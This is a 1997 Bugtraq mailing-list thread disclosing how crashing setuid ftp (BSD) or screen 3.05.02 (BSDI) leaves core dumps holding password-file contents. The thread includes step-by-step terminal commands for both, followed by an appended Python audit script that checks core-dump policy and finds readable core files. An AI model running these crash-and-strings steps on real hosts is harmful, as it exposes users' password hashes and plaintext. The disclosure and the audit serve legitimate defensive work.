Bugtraq mailing list archives
Re: screen 3.05.02
From: owner-bugtraq () NETSPACE ORG (Khelbin Sunvold)
Date: Sat, 15 Feb 1997 21:18:56 -0800
This exploit is very similar to the FTP exploit on BSD that creates an ftp.core file you can then strings and get the encrypted password file.

#ftp foobar.com
Welcom to foobar.com ftp site blah blah blah
please enter login name> evil
that user requires a password> evil2
User evil loged in welcome to foobar.com!
Remote set to type BIN
200>
(now hit ^Z to suspend the process)
#ps
PID TT STAT TIME COMMAND
9526 p0 Ss 0:00.12 -csh (csh)
9539 p0 R+ 0:00.02 ps
1000 p0 Ss 0:00.22 ftp
(get the PID number to the ftp process)
#kill -11 1000
(kill the process)
#fg
(bring the ftp back to the foreground)
Process Killed Core Dump (blah blah)
#ls
home mail public_html ftp.core
#strings ftp.core > test
#pico test

I know this is an older hole, but what the hell, it still works on BSD!

Bronc Buster
bbuster () succeed net
www2.succeed.net/~bbuster
The program under question is /usr/contrib/bin/screen (BSDI). This is screen version 3.05.02 and is installed setuid root, as it is "supposed" to be. Here is a demonstration:

$ screen
Screen version 3.05.02 (FAU) 19-Aug-93
Copyright (c) 1993 Juergen Weigert, Michael Schroeder
Copyright (c) 1987 Oliver Laumann
This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2, or (at your option) any later version.
This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
You should have received a copy of the GNU General Public License along with this program (see the file COPYING); if not, write to the Free Software Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
Send bugreports, fixes, enhancements, t-shirts, money, beer & pizza to screen () uni-erlangen de
(bah.. send them to Bugtraq!)
[Press Space or Return to end.]
$ screen
$ cd /tmp/screens/S-khelbin
$ ls
246.ttyp7.comet
$ mv 246.ttyp* 246.ttyp7.cometanonymousanonymousanonymousanonymous\
anonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymous\
anonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymous
$ screen -ls
/tmp/screens/S-khelbin/246.ttyp7.cometanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymous: connect: Invalid argument
%1 278 Abort - core dumped screen -ls
$ ls -l
total 176
srwx------ 1 khelbin khelbin 0 Feb 15 21:33 246.ttyp7.cometanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymous
-rw-r--r-- 1 khelbin khelbin 172032 Feb 15 21:33 core.screen
$ strings core.screen|less

The core.screen file contains unencrypted password strings from /etc/master.passwd, which of course, should not be readable by me. I'm also sure there's a buffer-overflow here but I haven't had as much time as I would like to look through the source yet.

-khelbin / 9x
email: khelbin () connix com
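Both posts in this thread describe the same bug class: a set-id program (ftp, screen) is killed with a signal, the kernel writes its core image into a directory the user controls, and the image carries privileged data (here, /etc/master.passwd contents). As an added defensive check, not code from either poster or from the screen project, the script below audits the two host settings that decide whether such a core can appear (the kernel's set-id core-dump policy and the session's core size limit) and walks a directory for leftover core images that group or other can read. It assumes a Linux host (the fs.suid_dumpable knob under /proc and the standard RLIMIT_CORE resource limit); the sample home directory it scans is constructed inline and contains no real core data.

```python
import os
import re
import resource
import stat
import tempfile
from dataclasses import dataclass
from typing import List, Optional

# Names a kernel or program commonly gives a core image: "core", "core.<pid>",
# "core.<prog>" (as in core.screen in the post) or "<prog>.core" (as in ftp.core).
CORE_NAME = re.compile(r"^(core(\.\w+)?|\w+\.core)$")

# Linux policy knob: 0 means set-id processes never dump core. FreeBSD's
# equivalent is the kern.sugid_coredump sysctl. (Assumption: the audited
# host is Linux; on other systems read_host_policy() reports None.)
SUID_DUMPABLE = "/proc/sys/fs/suid_dumpable"


@dataclass
class Finding:
    path: str
    name: str
    owner_uid: int
    mode: int
    reason: str


def is_core_name(name: str) -> bool:
    return CORE_NAME.match(name) is not None


def core_policy_findings(suid_dumpable: Optional[int], core_limit: int) -> List[str]:
    """Judge the two settings that decide whether a set-id crash leaves a core.

    suid_dumpable: value of fs.suid_dumpable, or None if it could not be read.
    core_limit:    soft RLIMIT_CORE in bytes (resource.RLIM_INFINITY == -1).
    """
    findings = []
    if suid_dumpable is None:
        findings.append("set-id core policy unreadable; verify the kernel setting by hand")
    elif suid_dumpable != 0:
        findings.append(f"set-id processes may dump core (suid_dumpable={suid_dumpable})")
    if core_limit != 0:
        findings.append(f"RLIMIT_CORE is {core_limit}, so crashes in this session write cores")
    return findings


def read_host_policy():
    """Read the live settings; suid_dumpable is None where the /proc knob is absent."""
    try:
        with open(SUID_DUMPABLE) as fh:
            suid_dumpable = int(fh.read().strip())
    except (OSError, ValueError):
        suid_dumpable = None
    soft, _hard = resource.getrlimit(resource.RLIMIT_CORE)
    return suid_dumpable, soft


def find_exposed_cores(root: str) -> List[Finding]:
    """Walk root and report core images that group or other can read.

    A core of a set-id program is a problem when someone other than root
    can open it, so the check is on the read bits, not on mere existence.
    """
    out = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not is_core_name(name):
                continue
            path = os.path.join(dirpath, name)
            st = os.lstat(path)
            if not stat.S_ISREG(st.st_mode):
                continue
            if st.st_mode & (stat.S_IRGRP | stat.S_IROTH):
                out.append(Finding(path, name, st.st_uid, stat.S_IMODE(st.st_mode),
                                   "core image readable by group or other"))
    return out


def make_sample_tree() -> str:
    """Constructed sample home directory: two exposed cores, one private core, one non-core."""
    root = tempfile.mkdtemp(prefix="coreaudit-")
    for name, mode in [("core.screen", 0o644), ("core", 0o640),
                       ("ftp.core", 0o600), ("notes.txt", 0o644)]:
        path = os.path.join(root, name)
        with open(path, "wb") as fh:
            fh.write(b"constructed placeholder, not a real core image\n")
        os.chmod(path, mode)  # set explicitly so the umask does not change the result
    return root


if __name__ == "__main__":
    for line in core_policy_findings(*read_host_policy()):
        print("POLICY:", line)
    for f in find_exposed_cores(make_sample_tree()):
        print(f"EXPOSED: {f.path} uid={f.owner_uid} mode={f.mode:04o} ({f.reason})")
```

Run against a real home directory by replacing the sample tree with the path to scan; an empty policy list and no findings means a crash of a set-id program on that host leaves nothing for an unprivileged user to run strings over.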